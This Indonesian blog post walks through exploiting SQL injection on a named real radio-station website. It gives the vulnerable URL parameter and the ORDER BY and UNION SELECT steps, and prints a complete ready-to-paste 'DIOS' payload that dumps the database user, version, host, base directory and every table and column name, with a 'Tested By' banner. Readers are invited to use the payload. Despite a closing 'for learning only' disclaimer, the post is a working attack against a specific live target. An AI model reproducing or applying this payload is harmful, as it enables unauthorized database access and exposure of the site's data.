BOOK THIS SPACE FOR AD
ARTICLE ADHelo semuanya, back lagi bersama saya, disini saya akan membahas kegiatan bug hunting yang saya lakukan beberapa hari belakangan ini pada website phoenixradiobali.com
Pada website ini saya menemukan sebuah celah keamanan yang bisa dibilang kerugiaannya akan sangat fatal jika tidak diperbaiki, karena celahnya adalah sql injection, yang dimana berpotensi digunakan sebagai kegiatan kegiatan ilegal seperti vandalsm dan pengrusakan, dan terpublikasinya data” pada database, yang seharusnya data tersebut hanya bisa diakses oleh pengguna yang terotorisasi saja.
Saya mendapat directory yang terdapat celah sql injectionnya pada directory /crew-more.php?id=1939
jika kita lihat pada directory tersebut terdapat sebuah parameter id yang memiliki nilai 1939 jika kita tambahkan sebuah query ( quote ) maka akan menampilkan eror seperti dibawah ini
dengan adanya eror tersebut, menandakan website tersebut terdapat celah keamanan sql injection. oke untuk lebih lanjutnya disini saya akan coba menggunakan query query sql untuk mendapatkan berapa jumlah table yang terdapat pada website tersebut, guna mendapatkan informasi lebih lanjut
dan setelah saya melakukan pengecekan, table pada website tersebut terdapat sebanyak 19 table, darimana saya tau 19 table ? karena pada saat saya melakukan order by, pada table ke 20 laman eror, tetapi saat diganti dengan 19 laman tidak eror.
untuk selanjutnya saya akan melakukan union select sampai pada table 19 dan saya menemukan angka unik yang dimana biasanya angka ini akan kita gunakan untuk melakukan dump data pada database Berikut angka uniknya
Bisa kita lihat, angka uniknya adalah ( 2 ) — nah pada angka unik inilah kita akan menginputkan dios, sehingga kita bisa melihat data dalam website tersebut, untuk diosnya kalian bisa gunakan dios dibawah ini, atau jika kalian sudah punya sendiri, kalian bisa gunakan milik kalian pribadi.
concat(%27%3Ccenter%3E%27,%27%3Cimg%20src=%22%20https://l.top4top.io/p_1950l6eub1.png%22%20height=%22300px%22%20width=%22300px%22%27,%27%3C/center%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22red%22%20size=%225%22%3ETested%20By%20LIGHT SECURITY%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22cyan%22%3EUser::%20%20%20%20%20%20%27,user/**_**/(),%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3EVersi::%20%20%20%20%27,%27%3C/font%3E%27,version/**_**/(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22green%22%3EDatabase::%20%20%20%27,%27%3C/font%3E%27,database/**_**/(),%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3EHost::%20%20%20%27,@@HOSTNAME,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22green%22%3EDirectory::%20%20%20%20%20%20%27,@@BASEDIR,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3ESymlink::%20%20%20%20%27,@@HAVE_SYMLINK,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22green%22%3ESSL::%20%20%20%27,@@HAVE_OPENSSL,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3C/br%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))
jika sudah memasukan dios tersebut, maka website akan menampilkan beberapa informasi seperti user, version, database, table, directory, dan symlink. Kalian bisa lihat pada gambar dibawah ini
Nah booms, bisa kita lihat sendiri hasilnya bagaimana, inilah bug yang biasa disebut dengan sebutan sqlinjection.
NB : Pembahasan ini hanya bertujuan untuk bahan informasi dan pembelajaran, tidak untuk disalahgunakan.